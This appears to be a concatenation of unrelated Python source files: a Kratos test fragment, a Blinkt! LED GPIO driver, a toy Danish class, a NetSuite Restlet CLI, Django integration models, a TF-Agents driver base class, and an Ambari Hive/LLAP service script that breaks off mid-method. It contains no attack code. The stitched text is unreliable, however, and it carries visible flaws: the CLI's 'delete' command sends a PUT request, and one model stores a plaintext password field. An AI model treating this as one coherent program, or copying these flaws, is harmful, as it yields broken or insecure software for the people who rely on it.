model_part.AddNodalSolutionStepVariable(Kratos.PRESSURE) model_part.AddNodalSolutionStepVariable(Kratos.VELOCITY) model_part.AddNodalSolutionStepVariable(Kratos.LOAD_MESHES) model_part.AddNodalSolutionStepVariable( Kratos.GREEN_LAGRANGE_STRAIN_TENSOR) @staticmethod def __GetValue(item, container_type, variable): if (container_type.endswith("non_historical")): return item.GetValue(variable) else: return item.GetSolutionStepValue(variable) @staticmethod def __GetNormValue(variable, value, norm_type): if (norm_type == "none"): return value norm_method = KratosStats.MethodUtilities.GetNormMethod( variable, norm_type) return norm_method(value) @staticmethod def __GetContainer(model_part, container_type): if (container_type.startswith("nodal")): return model_part.Nodes elif (container_type.startswith("element")): return model_part.Elements elif (container_type.startswith("condition")): return model_part.Conditions if __name__ == '__main__': KratosUnittest.main()blinkt_bitbang.py1-10 import atexit ###import RPi.GPIO as GPIO import pigpio __version__ = '0.1.1' pi = 
pigpio.pi() DAT = 23 CLK = 24 NUM_PIXELS = 8 BRIGHTNESS = 7 pixels = [[0, 0, 0, BRIGHTNESS]] * NUM_PIXELS _gpio_setup = False _clear_on_exit = True def _exit(): if _clear_on_exit: clear() show() # GPIO.cleanup() def set_brightness(brightness): """Set the brightness of all pixels :param brightness: Brightness: 0.0 to 1.0 """ if brightness < 0 or brightness > 1: raise ValueError("Brightness should be between 0.0 and 1.0") for x in range(NUM_PIXELS): pixels[x][3] = int(31.0 * brightness) & 0b11111 def clear(): """Clear the pixel buffer""" for x in range(NUM_PIXELS): pixels[x][0:3] = [0, 0, 0] def _write_byte(byte): for x in range(8): ### GPIO.output(DAT, byte & 0b10000000) pi.write(DAT, bool(byte & 0b10000000)) ### GPIO.output(CLK, 1) pi.write(CLK, 1) byte <<= 1 ### GPIO.output(CLK, 0) pi.write(CLK, 0) # Emit exactly enough clock pulses to latch the small dark die APA102s which are weird # for some reason it takes 36 clocks, the other IC takes just 4 (number of pixels/2) def _eof(): ### GPIO.output(DAT, 0) pi.write(DAT, 0) for x in range(36): ### GPIO.output(CLK, 1) pi.write(CLK, 1) ### GPIO.output(CLK, 0) pi.write(CLK, 0) def _sof(): ### GPIO.output(DAT, 0) pi.write(DAT, 0) for x in range(32): ### GPIO.output(CLK, 1) pi.write(CLK, 1) ### GPIO.output(CLK, 0) pi.write(CLK, 0) def show(): """Output the buffer to Blinkt!""" global _gpio_setup if not _gpio_setup: #### GPIO.setmode(GPIO.BCM) #### GPIO.setwarnings(False) #### GPIO.setup(DAT, GPIO.OUT) pi.set_mode(DAT, pigpio.OUTPUT) #### GPIO.setup(CLK, GPIO.OUT) pi.set_mode(CLK, pigpio.OUTPUT) atexit.register(_exit) _gpio_setup = True _sof() for pixel in pixels: r, g, b, brightness = pixel _write_byte(0b11100000 | brightness) _write_byte(b) _write_byte(g) _write_byte(r) _eof() def set_all(r, g, b, brightness=None): """Set the RGB value and optionally brightness of all pixels If you don't supply a brightness value, the last value set for each pixel be kept. :param r: Amount of red: 0 to 255 :param g: Amount of green: 0 to 255 :param b: Amount of blue: 0 to 255 :param brightness: Brightness: 0.0 to 1.0 (default around 0.2) """ for x in range(NUM_PIXELS): set_pixel(x, r, g, b, brightness) def get_pixel(x): """Get the RGB and brightness value of a specific pixel""" r, g, b, brightness = pixels[x] brightness /= 31.0 return r, g, b, round(brightness, 3) def set_pixel(x, r, g, b, brightness=None): """Set the RGB value, and optionally brightness, of a single pixel If you don't supply a brightness value, the last value will be kept. :param x: The horizontal position of the pixel: 0 to 7 :param r: Amount of red: 0 to 255 :param g: Amount of green: 0 to 255 :param b: Amount of blue: 0 to 255 :param brightness: Brightness: 0.0 to 1.0 (default around 0.2) """ if brightness is None: brightness = pixels[x][3] else: brightness = int(31.0 * brightness) & 0b11111 pixels[x] = [int(r) & 0xff, int(g) & 0xff, int(b) & 0xff, brightness] def set_clear_on_exit(value=True): """Set whether Blinkt! should be cleared upon exit By default Blinkt! will turn off the pixels on exit, but calling:: blinkt.set_clear_on_exit(False) Will ensure that it does not. :param value: True or False (default True) """ global _clear_on_exit _clear_on_exit = value 0 class Person: def __init__(self, navn): self.navn = navn def print(self): print("Hej, mit navn er",self.navn) elev = Person("Simon") elev.print() elev2 = Person("Phillip") elev2.print()fabriceb/netsuitenetsuite/cli/restlet.py import argparse from .. 
import json from ..client import NetSuite from ..config import Config __all__ = () def add_parser(parser, subparser): restlet_parser = subparser.add_parser( "restlet", description="Make NetSuite Restlet requests" ) restlet_subparser = restlet_parser.add_subparsers() _add_restlet_get_parser(restlet_parser, restlet_subparser) _add_restlet_post_parser(restlet_parser, restlet_subparser) _add_restlet_put_parser(restlet_parser, restlet_subparser) _add_restlet_delete_parser(restlet_parser, restlet_subparser) return (restlet_parser, restlet_subparser) def _add_restlet_get_parser(parser, subparser): async def restlet_get(config, args) -> str: restlet = _get_restlet_or_error(parser, config) resp = await restlet.get(script_id=args.script_id, deploy=args.deploy) return json.dumps(resp) p = subparser.add_parser( "get", description="Make a GET request to NetSuite Restlet" ) _add_default_restlet_args(p) p.set_defaults(func=restlet_get) def _add_restlet_post_parser(parser, subparser): async def restlet_post(config, args) -> str: restlet = _get_restlet_or_error(parser, config) with args.payload_file as fh: payload_str = fh.read() payload = json.loads(payload_str) resp = await restlet.post( script_id=args.script_id, deploy=args.deploy, json=payload ) return json.dumps(resp) p = subparser.add_parser( "post", description="Make a POST request to NetSuite Restlet" ) p.set_defaults(func=restlet_post) _add_default_restlet_args(p) p.add_argument("payload_file", type=argparse.FileType("r")) def _add_restlet_put_parser(parser, subparser): async def restlet_put(config, args) -> str: restlet = _get_restlet_or_error(parser, config) with args.payload_file as fh: payload_str = fh.read() payload = json.loads(payload_str) resp = await restlet.put( script_id=args.script_id, deploy=args.deploy, json=payload ) return json.dumps(resp) p = subparser.add_parser( "put", description="Make a PUT request to NetSuite Restlet" ) p.set_defaults(func=restlet_put) _add_default_restlet_args(p) p.add_argument("payload_file", type=argparse.FileType("r")) def _add_restlet_delete_parser(parser, subparser): async def restlet_delete(config, args) -> str: restlet = _get_restlet_or_error(parser, config) resp = await restlet.put(script_id=args.script_id, deploy=args.deploy) return json.dumps(resp) p = subparser.add_parser( "delete", description="Make a DELETE request to a NetSuite Restlet" ) p.set_defaults(func=restlet_delete) _add_default_restlet_args(p) def _get_restlet_or_error(parser, config: Config): ns = NetSuite(config) try: return ns.restlet # Cached property that initializes NetSuiteRestlet except RuntimeError as ex: parser.error(str(ex)) def _add_default_restlet_args(parser_: argparse.ArgumentParser): parser_.add_argument("script_id", type=int, help="The script to run") parser_.add_argument( "-d", "--deploy", type=int, default=1, help="The deployment version" ) """ Workspace Models """ from django.db import models from django.contrib.auth import get_user_model from django.contrib.postgres.fields import ArrayField from django_q.models import Schedule User = get_user_model() class Workspace(models.Model): """ Workspace model """ id = models.AutoField(primary_key=True, help_text='Unique Id to identify a workspace') name = models.CharField(max_length=255, help_text='Name of the workspace') user = models.ManyToManyField(User, help_text='Reference to users table') fyle_org_id = models.CharField(max_length=255, help_text='org id', unique=True) cluster_domain = models.CharField(max_length=255, help_text='Cluster Domain', null=True) 
last_synced_at = models.DateTimeField(help_text='Datetime when expenses were pulled last', null=True) source_synced_at = models.DateTimeField(help_text='Datetime when source dimensions were pulled', null=True) destination_synced_at = models.DateTimeField(help_text='Datetime when destination dimensions were pulled', null=True) created_at = models.DateTimeField(auto_now_add=True, help_text='Created at datetime') updated_at = models.DateTimeField(auto_now=True, help_text='Updated at datetime') class Meta: db_table = 'workspaces' REIMBURSABLE_EXPENSES_OBJECT_CHOICES = ( ('EXPENSE_REPORT', 'EXPENSE_REPORT'), ('BILL', 'BILL') ) COPORATE_CARD_EXPENSES_OBJECT_CHOICES = ( ('EXPENSE_REPORT', 'EXPENSE_REPORT'), ('BILL', 'BILL'), ('CHARGE_CARD_TRANSACTION', 'CHARGE_CARD_TRANSACTION') ) AUTO_MAP_EMPLOYEE_CHOICES = ( ('EMAIL', 'EMAIL'), ('NAME', 'NAME'), ('EMPLOYEE_CODE', 'EMPLOYEE_CODE'), ) def get_default_memo_fields(): return ['employee_email', 'category', 'spent_on', 'report_number', 'purpose', 'expense_link'] class Configuration(models.Model): """ Workspace General Settings """ id = models.AutoField(primary_key=True, help_text='Unique Id to identify a workspace') workspace = models.OneToOneField(Workspace, on_delete=models.PROTECT, help_text='Reference to Workspace model') reimbursable_expenses_object = models.CharField( max_length=50, choices=REIMBURSABLE_EXPENSES_OBJECT_CHOICES, help_text='Mapping Settings ( BILL / EXPENSE_REPORT )' ) corporate_credit_card_expenses_object = models.CharField( max_length=50, choices=COPORATE_CARD_EXPENSES_OBJECT_CHOICES, help_text='Mapping Settings ( BILL / CHARGE_CARD_TRANSACTION )', null=True ) import_projects = models.BooleanField(default=False, help_text='Auto import projects to Fyle') import_categories = models.BooleanField(default=False, help_text='Auto import caimport_categories to Fyle') sync_fyle_to_sage_intacct_payments = models.BooleanField(default=False, help_text='Auto Sync Payments from Fyle ' 'to Sage Intacct') sync_sage_intacct_to_fyle_payments = models.BooleanField(default=False, help_text='Auto Sync Payments from Sage ' 'Intacct to Fyle') auto_map_employees = models.CharField( max_length=50, choices=AUTO_MAP_EMPLOYEE_CHOICES, help_text='Auto Map Employees type from Sage Intacct to Fyle', null=True ) memo_structure = ArrayField( base_field=models.CharField(max_length=100), default=get_default_memo_fields, help_text='list of system fields for creating custom memo' ) auto_create_destination_entity = models.BooleanField(default=False, help_text='Auto create vendor / employee') created_at = models.DateTimeField(auto_now_add=True, help_text='Created at') updated_at = models.DateTimeField(auto_now=True, help_text='Updated at') class Meta: db_table = 'configurations' class SageIntacctCredential(models.Model): """ Table to store Sage Intacct credentials """ id = models.AutoField(primary_key=True) si_user_id = models.TextField(help_text='Stores Sage Intacct user id') si_company_id = models.TextField(help_text='Stores Sage Intacct company id') si_company_name = models.TextField(help_text='Stores Sage Intacct company name') si_user_password = models.TextField(help_text='Stores Sage Intacct user password') workspace = models.OneToOneField(Workspace, on_delete=models.PROTECT, help_text='Reference to Workspace model') created_at = models.DateTimeField(auto_now_add=True, help_text='Created at datetime') updated_at = models.DateTimeField(auto_now=True, help_text='Updated at datetime') class Meta: db_table = 'sage_intacct_credentials' class 
FyleCredential(models.Model): """ Table to store Fyle credentials """ id = models.AutoField(primary_key=True) refresh_token = models.TextField(help_text='Stores Fyle refresh token') workspace = models.OneToOneField(Workspace, on_delete=models.PROTECT, help_text='Reference to Workspace model') created_at = models.DateTimeField(auto_now_add=True, help_text='Created at datetime') updated_at = models.DateTimeField(auto_now=True, help_text='Updated at datetime') class Meta: db_table = 'fyle_credentials' class WorkspaceSchedule(models.Model): """ Workspace Schedule """ id = models.AutoField(primary_key=True, help_text='Unique Id to identify a schedule') workspace = models.OneToOneField(Workspace, on_delete=models.PROTECT, help_text='Reference to Workspace model') enabled = models.BooleanField(default=False) start_datetime = models.DateTimeField(help_text='Datetime for start of schedule', null=True) interval_hours = models.IntegerField(null=True) schedule = models.OneToOneField(Schedule, on_delete=models.PROTECT, null=True) class Meta: db_table = 'workspace_schedules' # coding=utf-8 # Copyright 2018 The TF-Agents Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Base class for drivers that takes steps in an environment.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import abc import six from tf_agents.environments import tf_environment from tf_agents.policies import tf_policy @six.add_metaclass(abc.ABCMeta) class Driver(object): """A driver that takes steps in an environment using a TF policy.""" def __init__(self, env, policy, observers=None): """Creates a Driver. Args: env: A tf_environment.Base environment. policy: A tf_policy.Base policy. observers: A list of observers that are updated after the driver is run. Each observer is a callable(TimeStepAction) that returns the input. TimeStepAction.time_step is a stacked batch [N+1, batch_size, ...] of timesteps and TimeStepAction.action is a stacked batch [N, batch_size, ...] of actions in time major form. Raises: ValueError: If env is not a tf_environment.Base or policy is not an instance of tf_policy.Base. """ if not isinstance(env, tf_environment.Base): raise ValueError('`env` must be an instance of tf_environment.Base.') if not isinstance(policy, tf_policy.Base): raise ValueError('`policy` must be an instance of tf_policy.Base.') self._env = env self._policy = policy self._observers = observers or [] @property def observers(self): return self._observers @abc.abstractmethod def run(self): """Takes steps in the environment and updates observers.""" 0 #!/usr/bin/env python """ Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. 
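Per the Driver docstring above, an observer is simply a callable that receives the stacked TimeStepAction batch and must return its input. A minimal illustrative observer (not part of TF-Agents) that only counts how many batches it has seen:

class StepCounterObserver(object):
    """Counts how many trajectory batches the driver has pushed through it."""

    def __init__(self):
        self.num_batches = 0

    def __call__(self, time_step_action):
        self.num_batches += 1
        return time_step_action   # observers must hand their input back unchanged

# driver = SomeConcreteDriver(env, policy, observers=[StepCounterObserver()])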
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ # Python Imports import subprocess import os import re import time import shutil from datetime import datetime import json # Ambari Commons & Resource Management imports from resource_management.libraries.script.script import Script from resource_management.libraries.functions import format from resource_management.libraries.functions.check_process_status import check_process_status from resource_management.core.source import InlineTemplate from resource_management.core.resources.system import Execute, Directory # Imports needed for Rolling/Express Upgrade from resource_management.libraries.functions import StackFeature from resource_management.libraries.functions.stack_features import check_stack_feature from resource_management.libraries.functions import conf_select from resource_management.libraries.functions import stack_select from resource_management.libraries.functions.copy_tarball import copy_to_hdfs from resource_management.core import shell from resource_management.core.exceptions import Fail from resource_management.core.logger import Logger from ambari_commons import OSCheck, OSConst from ambari_commons.os_family_impl import OsFamilyImpl from resource_management.core.exceptions import ComponentIsNotRunning from resource_management.libraries.functions.decorator import retry from resource_management.libraries.functions.security_commons import build_expectations, \ cached_kinit_executor, get_params_from_filesystem, validate_security_config_properties, \ FILE_TYPE_XML # Local Imports from setup_ranger_hive import setup_ranger_hive from hive_service_interactive import hive_service_interactive from hive_interactive import hive_interactive from hive_server import HiveServerDefault from setup_ranger_hive_interactive import setup_ranger_hive_interactive import traceback class HiveServerInteractive(Script): pass @OsFamilyImpl(os_family=OsFamilyImpl.DEFAULT) class HiveServerInteractiveDefault(HiveServerInteractive): def get_component_name(self): return "hive-server2-hive2" def install(self, env): import params self.install_packages(env) def configure(self, env): import params env.set_params(params) hive_interactive(name='hiveserver2') def pre_upgrade_restart(self, env, upgrade_type=None): Logger.info("Executing Hive Server Interactive Stack Upgrade pre-restart") import params env.set_params(params) if params.version and check_stack_feature(StackFeature.ROLLING_UPGRADE, params.version): stack_select.select("hive-server2-hive2", params.version) conf_select.select(params.stack_name, "hive2", params.version) # Copy hive.tar.gz and tez.tar.gz used by Hive Interactive to HDFS resource_created = copy_to_hdfs( "hive2", params.user_group, params.hdfs_user, skip=params.sysprep_skip_copy_tarballs_hdfs) resource_created = copy_to_hdfs( "tez_hive2", params.user_group, params.hdfs_user, skip=params.sysprep_skip_copy_tarballs_hdfs) or resource_created if resource_created: params.HdfsResource(None, action="execute") def start(self, env, upgrade_type=None): import params env.set_params(params) self.configure(env) if params.security_enabled: # Do the security setup, internally calls do_kinit() self.setup_security() # 
TODO : We need have conditional [re]start of LLAP once "status check command" for LLAP is ready. # Check status and based on that decide on [re]starting. # Start LLAP before Hive Server Interactive start. status = self._llap_start(env) if not status: raise Fail("Skipping START of Hive Server Interactive since LLAP app couldn't be STARTED.") # TODO : test the workability of Ranger and Hive2 during upgrade setup_ranger_hive_interactive(upgrade_type=upgrade_type) hive_service_interactive('hiveserver2', action='start', upgrade_type=upgrade_type) def stop(self, env, upgrade_type=None): import params env.set_params(params) if params.security_enabled: self.do_kinit() # Stop Hive Interactive Server first hive_service_interactive('hiveserver2', action='stop') if not params.is_restart_command: self._llap_stop(env) else: Logger.info("LLAP stop is skipped as its a restart command") def status(self, env): import status_params env.set_params(status_params) # We are not doing 'llap' status check done here as part of status check for 'HSI', as 'llap' status # check is a heavy weight operation. pid_file = format("{hive_pid_dir}/{hive_interactive_pid}") # Recursively check all existing gmetad pid files check_process_status(pid_file) def security_status(self, env): import status_params env.set_params(status_params) if status_params.security_enabled: props_value_check = {"hive.server2.authentication": "KERBEROS", "hive.metastore.sasl.enabled": "true", "hive.security.authorization.enabled": "true"} props_empty_check = ["hive.server2.authentication.kerberos.keytab", "hive.server2.authentication.kerberos.principal", "hive.server2.authentication.spnego.principal", "hive.server2.authentication.spnego.keytab"] props_read_check = ["hive.server2.authentication.kerberos.keytab", "hive.server2.authentication.spnego.keytab"] hive_site_props = build_expectations('hive-site', props_value_check, props_empty_check, props_read_check) hive_expectations ={} hive_expectations.update(hive_site_props) security_params = get_params_from_filesystem(status_params.hive_server_interactive_conf_dir, {'hive-site.xml': FILE_TYPE_XML}) result_issues = validate_security_config_properties(security_params, hive_expectations) if not result_issues: # If all validations passed successfully try: # Double check the dict before calling execute if 'hive-site' not in security_params \ or 'hive.server2.authentication.kerberos.keytab' not in security_params['hive-site'] \ or 'hive.server2.authentication.kerberos.principal' not in security_params['hive-site'] \ or 'hive.server2.authentication.spnego.keytab' not in security_params['hive-site'] \ or 'hive.server2.authentication.spnego.principal' not in security_params['hive-site']: self.put_structured_out({"securityState": "UNSECURED"}) self.put_structured_out({"securityIssuesFound": "Keytab file or principal are not set property."}) return cached_kinit_executor(status_params.kinit_path_local, status_params.hive_user, security_params['hive-site']['hive.server2.authentication.kerberos.keytab'], security_params['hive-site']['hive.server2.authentication.kerberos.principal'], status_params.hostname, status_params.tmp_dir) cached_kinit_executor(status_params.kinit_path_local, status_params.hive_user, security_params['hive-site']['hive.server2.authentication.spnego.keytab'], security_params['hive-site']['hive.server2.authentication.spnego.principal'], status_params.hostname, status_params.tmp_dir) self.put_structured_out({"securityState": "SECURED_KERBEROS"}) except Exception as e: 
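The status() method above delegates to check_process_status(), which reads the PID file and raises when the process is not running. Roughly the same idea, written with plain os calls as a hypothetical stand-in rather than the Ambari implementation:

import os

def pid_file_is_live(pid_file):
    """Return True if pid_file exists and names a process we can signal."""
    try:
        with open(pid_file) as fh:
            pid = int(fh.read().strip())
        os.kill(pid, 0)          # signal 0: existence/permission check only, no signal sent
        return True
    except (IOError, OSError, ValueError):
        return False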
self.put_structured_out({"securityState": "ERROR"}) self.put_structured_out({"securityStateErrorInfo": str(e)}) else: issues = [] for cf in result_issues: issues.append("Configuration file %s did not pass the validation. Reason: %s" % (cf, result_issues[cf])) self.put_structured_out({"securityIssuesFound": ". ".join(issues)}) self.put_structured_out({"securityState": "UNSECURED"}) else: self.put_structured_out({"securityState": "UNSECURED"}) def restart_llap(self, env): """ Custom command to Restart LLAP """ Logger.info("Custom Command to retart LLAP") import params env.set_params(params) if params.security_enabled: self.do_kinit() self._llap_stop(env) self._llap_start(env) def _llap_stop(self, env): import params Logger.info("Stopping LLAP") stop_cmd = ["slider", "stop", params.llap_app_name] code, output, error = shell.call(stop_cmd, user=params.hive_user, stderr=subprocess.PIPE, logoutput=True) if code == 0: Logger.info(format("Stopped {params.llap_app_name} application on Slider successfully")) elif code == 69 and output is not None and "Unknown application instance" in output: Logger.info(format("Application {params.llap_app_name} was already stopped on Slider")) else: raise Fail(format("Could not stop application {params.llap_app_name} on Slider. {error}\n{output}")) # Will exit with code 4 if need to run with "--force" to delete directories and registries. Execute(('slider', 'destroy', params.llap_app_name, "--force"), user=params.hive_user, timeout=30, ignore_failures=True, ) """ Controls the start of LLAP. """ def _llap_start(self, env, cleanup=False): import params env.set_params(params) if params.hive_server_interactive_ha: """ Check llap app state """ Logger.info("HSI HA is enabled. Checking if LLAP is already running ...") if params.stack_supports_hive_interactive_ga: status = self.check_llap_app_status_in_llap_ga(params.llap_app_name, 2, params.hive_server_interactive_ha) else: status = self.check_llap_app_status_in_llap_tp(params.llap_app_name, 2, params.hive_server_interactive_ha) if status: Logger.info("LLAP app '{0}' is already running.".format(params.llap_app_name)) return True else: Logger.info("LLAP app '{0}' is not running. llap will be started.".format(params.llap_app_name)) pass # Call for cleaning up the earlier run(s) LLAP package folders. self._cleanup_past_llap_package_dirs() Logger.info("Starting LLAP") LLAP_PACKAGE_CREATION_PATH = Script.get_tmp_dir() unique_name = "llap-slider%s" % datetime.utcnow().strftime('%Y-%m-%d_%H-%M-%S') cmd = format("/usr/lib/hive/bin/hive --service llap --slider-am-container-mb {params.slider_am_container_mb} " "--size 3072m --cache 1024m --xmx {params.llap_heap_size}m " "--loglevel {params.llap_log_level} {params.llap_extra_slider_opts} --output {LLAP_PACKAGE_CREATION_PATH}/{unique_name}") # Append params that are supported from Hive llap GA version. if params.stack_supports_hive_interactive_ga: # Figure out the Slider Anti-affinity to be used. # YARN does not support anti-affinity, and therefore Slider implements AA by the means of exclusion lists, i.e, it # starts containers one by one and excludes the nodes it gets (adding a delay of ~2sec./machine). When the LLAP # container memory size configuration is more than half of YARN node memory, AA is implicit and should be avoided. 
slider_placement = 4 if long(params.llap_daemon_container_size) > (0.5 * long(params.yarn_nm_mem)): slider_placement = 0 Logger.info("Setting slider_placement : 0, as llap_daemon_container_size : {0} > 0.5 * " "YARN NodeManager Memory({1})".format(params.llap_daemon_container_size, params.yarn_nm_mem)) else: Logger.info("Setting slider_placement: 4, as llap_daemon_container_size : {0} <= 0.5 * " "YARN NodeManager Memory({1})".format(params.llap_daemon_container_size, params.yarn_nm_mem)) cmd += format(" --slider-placement {slider_placement} --skiphadoopversion --skiphbasecp --instances {params.num_llap_daemon_running_nodes}") # Setup the logger for the ga version only cmd += format(" --logger {params.llap_logger}") else: cmd += format(" --instances {params.num_llap_nodes}") if params.security_enabled: llap_keytab_splits = params.hive_llap_keytab_file.split("/") Logger.debug("llap_keytab_splits : {0}".format(llap_keytab_splits)) cmd += format(" --slider-keytab-dir .slider/keytabs/{params.hive_user}/ --slider-keytab " "{llap_keytab_splits[4]} --slider-principal {params.hive_llap_principal}") # Add the aux jars if they are specified. If empty, dont need to add this param. if params.hive_aux_jars: cmd+= format(" --auxjars {params.hive_aux_jars}") # Append args. llap_java_args = InlineTemplate(params.llap_app_java_opts).get_content() cmd += format(" --args \" {llap_java_args}\"") # Append metaspace size to args. if params.java_version > 7 and params.llap_daemon_container_size > 4096: if params.llap_daemon_container_size <= 32768: metaspaceSize = "256m" else: metaspaceSize = "1024m" cmd = cmd[:-1] + " -XX:MetaspaceSize="+metaspaceSize+ "\"" run_file_path = None try: Logger.info(format("LLAP start command: {cmd}")) code, output, error = shell.checked_call(cmd, user=params.hive_user, quiet = True, stderr=subprocess.PIPE, logoutput=True) if code != 0 or output is None: raise Fail("Command failed with either non-zero return code or no output.") # E.g., output: # Prepared llap-slider-05Apr2016/run.sh for running LLAP on Slider exp = r".*Prepared (.*?run.sh) for running LLAP" run_file_path = None out_splits = output.split("\n") for line in out_splits: line = line.strip() m = re.match(exp, line, re.I) if m and len(m.groups()) == 1: run_file_name = m.group(1) #run_file_path = os.path.join(params.hive_user_home_dir, run_file_name) run_file_path = run_file_name break if not run_file_path: raise Fail("Did not find run.sh file in output: " + str(output)) Logger.info(format("Run file path: {run_file_path}")) Execute(run_file_path, user=params.hive_user, logoutput=True) Logger.info("Submitted LLAP app name : {0}".format(params.llap_app_name)) # We need to check the status of LLAP app to figure out it got # launched properly and is in running state. Then go ahead with Hive Interactive Server start. 
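The run-file extraction above scans the llap package command output line by line with the regex r".*Prepared (.*?run.sh) for running LLAP". A standalone illustration of that parse against the sample line quoted in the comment:

import re

SAMPLE_OUTPUT = """
WARNING: some MOTD noise
Prepared llap-slider-05Apr2016/run.sh for running LLAP on Slider
"""

exp = r".*Prepared (.*?run.sh) for running LLAP"
run_file_path = None
for line in SAMPLE_OUTPUT.split("\n"):
    m = re.match(exp, line.strip(), re.I)
    if m and len(m.groups()) == 1:
        run_file_path = m.group(1)
        break

assert run_file_path == "llap-slider-05Apr2016/run.sh"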
if params.stack_supports_hive_interactive_ga: status = self.check_llap_app_status_in_llap_ga(params.llap_app_name, params.num_retries_for_checking_llap_status) else: status = self.check_llap_app_status_in_llap_tp(params.llap_app_name, params.num_retries_for_checking_llap_status) if status: Logger.info("LLAP app '{0}' deployed successfully.".format(params.llap_app_name)) return True else: Logger.error("LLAP app '{0}' deployment unsuccessful.".format(params.llap_app_name)) return False except: # Attempt to clean up the packaged application, or potentially rename it with a .bak if run_file_path is not None and cleanup: parent_dir = os.path.dirname(run_file_path) Directory(parent_dir, action = "delete", ignore_failures = True, ) # throw the original exception raise """ Checks and deletes previous run 'LLAP package' folders, ignoring three latest packages. Last three are are ignore for debugging/reference purposes. Helps in keeping check on disk space used. """ def _cleanup_past_llap_package_dirs(self): try: import params Logger.info("Determining previous run 'LLAP package' folder(s) to be deleted ....") llap_package_folder_name_prefix = "llap-slider" # Package name is like : llap-sliderYYYY-MM-DD-HH:MM:SS num_folders_to_retain = 3 # Hardcoding it as of now, as no considerable use was found to provide an env param. file_names = [dir_name for dir_name in os.listdir(Script.get_tmp_dir()) if dir_name.startswith(llap_package_folder_name_prefix)] file_names.sort() del file_names[-num_folders_to_retain:] # Ignore 'num_folders_to_retain' latest package folders. Logger.info("Previous run 'LLAP package' folder(s) to be deleted = {0}".format(file_names)) if file_names: for path in file_names: abs_path = Script.get_tmp_dir()+"/"+path Directory(abs_path, action = "delete", ignore_failures = True ) else: Logger.info("No '{0}*' folder deleted.".format(llap_package_folder_name_prefix)) except: Logger.exception("Exception while doing cleanup for past 'LLAP package(s)':") """ Does kinit and copies keytab for Hive/LLAP to HDFS. """ def setup_security(self): import params self.do_kinit() # Copy params.hive_llap_keytab_file to hdfs://:/user//.slider/keytabs/ , required by LLAP slider_keytab_install_cmd = format("slider install-keytab --keytab {params.hive_llap_keytab_file} --folder {params.hive_user} --overwrite") Execute(slider_keytab_install_cmd, user=params.hive_user) def do_kinit(self): import params hive_interactive_kinit_cmd = format("{kinit_path_local} -kt {params.hive_server2_keytab} {params.hive_principal}; ") Execute(hive_interactive_kinit_cmd, user=params.hive_user) llap_kinit_cmd = format("{kinit_path_local} -kt {params.hive_llap_keytab_file} {params.hive_llap_principal}; ") Execute(llap_kinit_cmd, user=params.hive_user) """ Get llap app status data for LLAP Tech Preview code base. """ def _get_llap_app_status_info_in_llap_tp(self, app_name): import status_params LLAP_APP_STATUS_CMD_TIMEOUT = 0 llap_status_cmd = format("/usr/lib/hive/bin/hive --service llapstatus --name {app_name} --findAppTimeout {LLAP_APP_STATUS_CMD_TIMEOUT}") code, output, error = shell.checked_call(llap_status_cmd, user=status_params.hive_user, stderr=subprocess.PIPE, logoutput=False) Logger.info("Received 'llapstatus' command 'output' : {0}".format(output)) if code == 0: return self._make_valid_json(output) else: Logger.info("'LLAP status command' output : ", output) Logger.info("'LLAP status command' error : ", error) Logger.info("'LLAP status command' exit code : ", code) raise Fail("Error getting LLAP app status. 
") """ Get llap app status data for LLAP GA code base. Parameters: 'percent_desired_instances_to_be_up' : A value b/w 0.0 and 1.0. 'total_timeout' : Total wait time while checking the status via llapstatus command 'refresh_rate' : Frequency of polling for llapstatus. """ def _get_llap_app_status_info_in_llap_ga(self, percent_desired_instances_to_be_up, total_timeout, refresh_rate): import status_params # llapstatus comamnd : llapstatus -w -r -i -t # -w : Watch mode waits until all LLAP daemons are running or subset of the nodes are running (threshold can be specified via -r option) (Default wait until all nodes are running) # -r : When watch mode is enabled (-w), wait until the specified threshold of nodes are running (Default 1.0 which means 100% nodes are running) # -i : Amount of time in seconds to wait until subsequent status checks in watch mode (Default: 1sec) # -t : Exit watch mode if the desired state is not attained until the specified timeout (Default: 300sec) # # example : llapstatus -w -r 0.8 -i 2 -t 150 llap_status_cmd = format("/usr/lib/hive/bin/hive --service llapstatus -w -r {percent_desired_instances_to_be_up} -i {refresh_rate} -t {total_timeout}") Logger.info("\n\n\n\n\n"); Logger.info("LLAP status command : {0}".format(llap_status_cmd)) code, output, error = shell.checked_call(llap_status_cmd, user=status_params.hive_user, quiet=True, stderr=subprocess.PIPE, logoutput=True) if code == 0: return self._make_valid_json(output) else: Logger.info("'LLAP status command' output : ", output) Logger.info("'LLAP status command' error : ", error) Logger.info("'LLAP status command' exit code : ", code) raise Fail("Error getting LLAP app status. ") """ Remove extra lines from 'llapstatus' status output (eg: because of MOTD logging) so as to have a valid JSON data to be passed in to JSON converter. """ def _make_valid_json(self, output): ''' Note: It is assumed right now that extra lines will be only at the start and not at the end. Sample expected JSON to be passed for 'loads' is either of the form : Case 'A': { "amInfo" : { "appName" : "llap0", "appType" : "org-apache-slider", "appId" : "APP1", "containerId" : "container_1466036628595_0010_01_000001", "hostname" : "hostName", "amWebUrl" : "http://hostName:port/" }, "state" : "LAUNCHING", .... "desiredInstances" : 1, "liveInstances" : 0, .... .... } or Case 'B': { "state" : "APP_NOT_FOUND" } ''' splits = output.split("\n") len_splits = len(splits) if (len_splits < 3): raise Fail ("Malformed JSON data received from 'llapstatus' command. Exiting ....") marker_idx = None # To detect where from to start reading for JSON data for idx, split in enumerate(splits): curr_elem = split.strip() if idx+2 > len_splits: raise Fail("Iterated over the received 'llapstatus' comamnd. Couldn't validate the received output for JSON parsing.") next_elem = (splits[(idx + 1)]).strip() if curr_elem == "{": if next_elem == "\"amInfo\" : {" and (splits[len_splits-1]).strip() == '}': # For Case 'A' marker_idx = idx break; elif idx+3 == len_splits and 